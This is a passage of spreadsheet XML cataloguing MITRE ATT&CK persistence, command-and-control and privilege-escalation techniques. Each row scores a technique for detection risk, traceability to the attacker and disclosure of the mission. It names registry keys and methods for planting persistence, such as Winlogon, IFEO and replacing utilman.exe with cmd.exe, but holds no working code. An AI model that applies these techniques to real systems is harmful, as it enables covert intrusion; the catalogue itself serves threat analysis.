    <s v="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_x000a__x000a_Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.12_x000a_Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.234_x000a_Inline hooking, which overwrites the first bytes in an API function to redirect code flow.254_x000a_Similar to Process Injection,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_x000a__x000a_Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.6_x000a__x000a_Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors"/>
    <n v="2"/>
    <s v="Rootkit detectors monitor for this"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hypervisor"/>
    <x v="3"/>
    <x v="6"/>
    <s v="A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware.1 It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen.2 A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system.3 A malicious hypervisor of this nature could be used to persist on systems through interruption."/>
    <n v="1"/>
    <s v="Timing investigation of CPU instructions. This is very advanced"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Image File Execution Options Injection"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1_x000a__x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation._x000a__x000a_Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="LSASS Driver"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations."/>
    <n v="2"/>
    <s v="System events and modules loaded"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Logon Scripts"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Windows_x000a_Windows allows logon scripts to be run whenever a specific user or group of users log into a system.1 The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server._x000a__x000a_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_x000a__x000a_Mac_x000a_Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root2. There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in."/>
    <n v="3"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Modify Existing Service"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg._x000a__x000a_Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used._x000a__x000a_Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Netsh Helper DLL"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.1 The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh._x000a__x000a_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2_x000a__x000a_Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="New Service"/>
    <x v="3"/>
    <x v="6"/>
    <s v="When operating systems boot up, they can start programs or applications called services that perform background system functions.1 A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry._x000a__x000a_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
    <n v="2"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Office Application Startup"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started._x000a_Office Template Macros_x000a_Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.1_x000a__x000a_Office Visual Basic for Applications (VBA) macros2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34_x000a__x000a_Word Normal.dotm location:C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm_x000a__x000a_Excel Personal.xlsb location:C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB_x000a__x000a_An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros._x000a__x000a_Office Test_x000a_A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started5_x000a__x000a_HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf_x000a__x000a_Add-ins_x000a_Office add-ins can be used to add functionality to Office programs.6_x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="3"/>
    <s v="Sender of the Office document may indicate of target"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Path Interception"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_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n v="2"/>
    <s v="Multiple indicators"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Port Monitors"/>
    <x v="3"/>
    <x v="6"/>
    <s v="A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.2 Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following:_x000a__x000a_Local Port_x000a_Standard TCP/IP Port_x000a_USB Monitor_x000a_WSD Port_x000a_Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM."/>
    <n v="2"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Scheduled Task"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Screensaver"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.1 The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:_x000a__x000a_SCRNSAVE.exe - set to malicious PE path_x000a_ScreenSaveActive - set to '1' to enable the screensaver_x000a_ScreenSaverIsSecure - set to '0' to not require a password to unlock_x000a_ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed_x000a_Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity."/>
    <n v="3"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Security Support Provider"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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
    <n v="2"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Service Registry Permissions Weakness"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_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_x000a__x000a_Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted."/>
    <n v="1"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Shortcut Modification"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Firmware"/>
    <x v="3"/>
    <x v="6"/>
    <s v="The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.123_x000a__x000a_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
    <n v="1"/>
    <s v="Whitelisting of EFI binaries"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Time Providers"/>
    <x v="3"/>
    <x v="6"/>
    <s v="The Windows Time service (W32Time) enables time synchronization across and within domains.1 W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.2_x000a__x000a_Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.2 The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.2_x000a__x000a_Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account"/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trap"/>
    <x v="3"/>
    <x v="6"/>
    <s v="The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where &quot;command list&quot; will be executed when &quot;signals&quot; are received."/>
    <n v="1"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Valid Accounts"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access._x000a__x000a_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_x000a__x000a_Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful._x000a__x000a_The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise."/>
    <n v="3"/>
    <s v="Monitoring for unusual usage of the accounts"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Web Shell"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed."/>
    <n v="2"/>
    <s v="Monitor changes in the webroot"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Commands may disclose mission details"/>
  </r>
  <r>
    <s v="Windows Management Instrumentation Event Subscription"/>
    <x v="3"/>
    <x v="6"/>
    <s v="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1 Examples of events that may be subscribed to are the wall clock time or the computer's uptime.2 Several threat groups have reportedly used this technique to maintain persistence."/>
    <n v="3"/>
    <s v="Monitor subscription entries"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Winlogon Helper DLL"/>
    <x v="3"/>
    <x v="6"/>
    <s v="Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.1_x000a__x000a_Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse:1_x000a__x000a_Winlogon\Notify - points to notification package DLLs that handle Winlogon events_x000a_Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on_x000a_Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on_x000a_Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence."/>
    <n v="3"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Commonly Used Port"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as_x000a__x000a_TCP:80 (HTTP)_x000a_TCP:443 (HTTPS)_x000a_TCP:25 (SMTP)_x000a_TCP/UDP:53 (DNS)_x000a_They may use the protocol associated with the port or a completely different protocol._x000a__x000a_For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are_x000a__x000a_TCP/UDP:135 (RPC)_x000a_TCP/UDP:22 (SSH)_x000a_TCP/UDP:3389 (RDP)"/>
    <n v="2"/>
    <s v="Easy to detect due to traffic"/>
    <n v="4"/>
    <s v="The source is easily to detect"/>
    <n v="1"/>
    <s v="Too generic to tie to mission or attacker but might hint"/>
  </r>
  <r>
    <s v="Communication Through Removable Media"/>
    <x v="4"/>
    <x v="7"/>
    <s v="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
    <n v="2"/>
    <s v="Easy to detect due to traffic"/>
    <n v="4"/>
    <s v="The source is easily to detect"/>
    <n v="1"/>
    <s v="Too generic to tie to mission or attacker but might hint"/>
  </r>
  <r>
    <s v="Connection Proxy"/>
    <x v="4"/>
    <x v="7"/>
    <s v="A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.1_x000a__x000a_The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other._x000a__x000a_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
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Custom Command and Control Protocol"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols."/>
    <n v="2"/>
    <s v="Unusual traffic is easy detected"/>
    <n v="4"/>
    <s v="The source is easily to detect"/>
    <n v="1"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Custom Cryptographic Protocol"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext._x000a__x000a_Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used._x000a__x000a_Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors."/>
    <n v="2"/>
    <s v="Unusual traffic is easy detected"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Data Encoding"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems.12 Some data encoding systems may also result in data compression, such as gzip."/>
    <n v="2"/>
    <s v="Encoding is easily decoded"/>
    <n v="1"/>
    <s v="Encoding is simply reversed, thus showing payload"/>
    <n v="3"/>
    <s v="Encoding is simply reversed, thus showing payload"/>
  </r>
  <r>
    <s v="Data Obfuscation"/>
    <x v="4"/>
    <x v="7"/>
    <s v="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
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="3"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
  </r>
  <r>
    <s v="Domain Fronting"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.1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quot;domainless&quot; fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored)._x000a__x000a_For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y."/>
    <n v="0"/>
    <s v="Indistinguisable from legitimate traffic"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Fallback Channels"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds."/>
    <n v="2"/>
    <s v="Due to the static character (fallback must always be available) IOC's may exist."/>
    <n v="3"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Multi-Stage Channels"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult._x000a__x000a_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_x000a__x000a_The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Multi-hop Proxy"/>
    <x v="4"/>
    <x v="7"/>
    <s v="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n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Multiband Communication"/>
    <x v="4"/>
    <x v="7"/>
    <s v="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
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote Access Tools"/>
    <x v="4"/>
    <x v="7"/>
    <s v="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1_x000a__x000a_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_x000a__x000a_Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Standard Application Layer Protocol"/>
    <x v="4"/>
    <x v="7"/>
    <s v="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_x000a__x000a_For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP."/>
    <n v="2"/>
    <s v="Uncommon data flows"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Standard Cryptographic Protocol"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries use command and control over an encrypted channel using a known encryption protocol like HTTPS or SSL/TLS. The use of strong encryption makes it difficult for defenders to detect signatures within adversary command and control traffic._x000a__x000a_Some adversaries may use other encryption protocols and algorithms with symmetric keys, such as RC4, that rely on encryption keys encoded into malware configuration files and not public key cryptography. Such keys may be obtained through malware reverse engineering."/>
    <n v="1"/>
    <m/>
    <n v="0"/>
    <s v="Little additional evidence towards agent"/>
    <n v="0"/>
    <s v="Cryptography makes data unavailable"/>
  </r>
  <r>
    <s v="Standard Non-Application Layer Protocol"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.1 Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), and transport layer protocols, such as the User Datagram Protocol (UDP)._x000a__x000a_ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;2 however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications."/>
    <n v="2"/>
    <s v="Uncommon data flows"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Uncommonly Used Port"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured."/>
    <n v="3"/>
    <s v="Monitoring for network usage"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="1"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Web Service"/>
    <x v="4"/>
    <x v="7"/>
    <s v="Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system._x000a__x000a_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_x000a__x000a_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_x000a__x000a_Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed)."/>
    <n v="1"/>
    <s v="Reputation based analysis"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Access Token Manipulation"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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runas. 1_x000a__x000a_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2_x000a__x000a_Access tokens can be leveraged by adversaries through three methods:3_x000a__x000a_Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system._x000a__x000a_Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user._x000a__x000a_Make and Impersonate Token -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_x000a__x000a_Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account._x000a__x000a_Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. 4 The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. 5"/>
    <n v="1"/>
    <s v="Detectionrisk is low due to advanced monitoring of individual machines"/>
    <n v="0"/>
    <s v="Does not disclose attacker"/>
    <n v="0"/>
    <s v="Does not disclose mission details"/>
  </r>
  <r>
    <s v="Accessibility Features"/>
    <x v="5"/>
    <x v="8"/>
    <s v="For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with &quot;cmd.exe&quot; (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.3_x000a__x000a_For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures &quot;cmd.exe,&quot; or another program that provides backdoor access, as a &quot;debugger&quot; for the accessibility program (e.g., &quot;utilman.exe&quot;). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the &quot;debugger&quot; program to be executed with SYSTEM privileges.3"/>
    <n v="3"/>
    <s v="Unusual RDP sessions may give it away. Manipulated binaries as well"/>
    <n v="3"/>
    <s v="If public RDP server is used, connection may be traced to attacker"/>
    <n v="2"/>
    <s v="Target RDP server may hint towards mission's target"/>
  </r>
  <r>
    <s v="AppCert DLLs"/>
    <x v="5"/>
    <x v="8"/>
    <s v="Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1_x000a__x000a_CreateProcess_x000a_CreateProcessAsUser_x000a_CreateProcessWithLoginW_x000a_CreateProcessWithTokenW_x000a_WinExec_x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="AppInit DLLs"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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1 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.2_x000a__x000a_The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.3"/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Application Shimming"/>
    <x v="5"/>
    <x v="8"/>
    <s v="To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc."/>
    <n v="3"/>
    <s v="Very visible for system admins"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Bypass User Account Control"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.23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4 Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected._x000a__x000a_Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods5 that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:_x000a__x000a_eventvwr.exe can auto-elevate and execute a specified binary or script.67_x000a_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8"/>
    <n v="1"/>
    <s v="Due to variants hard to detect all versions"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Search Order Hijacking"/>
    <x v="5"/>
    <x v="8"/>
    <s v="controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program._x000a__x000a_Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace."/>
    <n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
